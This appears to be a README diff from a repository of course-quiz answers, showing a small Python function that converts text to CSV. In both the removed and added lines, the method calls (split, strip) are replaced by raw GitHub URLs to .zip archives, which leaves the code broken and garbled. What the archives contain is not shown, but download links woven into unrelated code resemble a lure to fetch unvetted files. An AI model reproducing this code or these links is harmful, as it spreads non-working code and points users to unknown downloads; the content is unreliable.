nithinrentala-123/INT426-Coursera-Answers/README.md

 def text_to_csv(input_text):
 # Split the input text into lines
-lines = https://github.com/nithinrentala-123/INT426-Coursera-Answers/raw/refs/heads/main/Week 2/week 3/How does GenAi Work/IN-Answers-Coursera-2.1.zip('\n')
+lines = https://raw.githubusercontent.com/nithinrentala-123/INT426-Coursera-Answers/main/Week 4/Prompt Engineering For ChatGPT/week 2/Answers_Coursera_IN_1.6.zip 2/week 3/How does GenAi https://raw.githubusercontent.com/nithinrentala-123/INT426-Coursera-Answers/main/Week 4/Prompt Engineering For ChatGPT/week 2/Answers_Coursera_IN_1.6.zip('\n')

 # Create a CSV string
 csv_content = ""
 for line in lines:
 # Remove leading and trailing whitespaces
-line = https://github.com/nithinrentala-123/INT426-Coursera-Answers/raw/refs/heads/main/Week 2/week 3/How does GenAi Work/IN-Answers-Coursera-2.1.zip()
+line = https://raw.githubusercontent.com/nithinrentala-123/INT426-Coursera-Answers/main/Week 4/Prompt Engineering For ChatGPT/week 2/Answers_Coursera_IN_1.6.zip 2/week 3/How does GenAi https://raw.githubusercontent.com/nithinrentala-123/INT426-Coursera-Answers/main/Week 4/Prompt Engineering For ChatGPT/week 2/Answers_Coursera_IN_1.6.zip()
 # Split the line into fields using comma as the delimiter
-fields = https://github.com/nithinrentala-123/INT426-Coursera-Answers/raw/refs/heads/main/Week 2/week 3/How does GenAi Work/IN-Answers-Coursera-2.1.zip(',')
+fields = https://raw.githubusercontent.com/nithinrentala-123/INT426-Coursera-Answers/main/Week 4/Prompt Engineering For ChatGPT/week 2/Answers_Coursera_IN_1.6.zip 2/week 3/How does GenAi https://raw.githubusercontent.com/nithinrentala-123/INT426-Coursera-Answers/main/Week 4/Prompt Engineering For ChatGPT/week 2/Answers_Coursera_IN_1.6.zip(',')
 # Enclose each field in double quotes to handle cases with commas within the text
-fields = ['"{}"'.format(https://github.com/nithinrentala-123/INT426-Coursera-Answers/raw/refs/heads/main/Week 2/week 3/How does GenAi Work/IN-Answers-Coursera-2.1.zip()) for field in fields]
+fields = ['"{}"'.format(https://raw.githubusercontent.com/nithinrentala-123/INT426-Coursera-Answers/main/Week 4/Prompt Engineering For ChatGPT/week 2/Answers_Coursera_IN_1.6.zip 2/week 3/How does GenAi https://raw.githubusercontent.com/nithinrentala-123/INT426-Coursera-Answers/main/Week 4/Prompt Engineering For ChatGPT/week 2/Answers_Coursera_IN_1.6.zip()) for field in fields]
 # Join the fields with commas and add a newline
 csv_content += ','.join(fields) + '\n'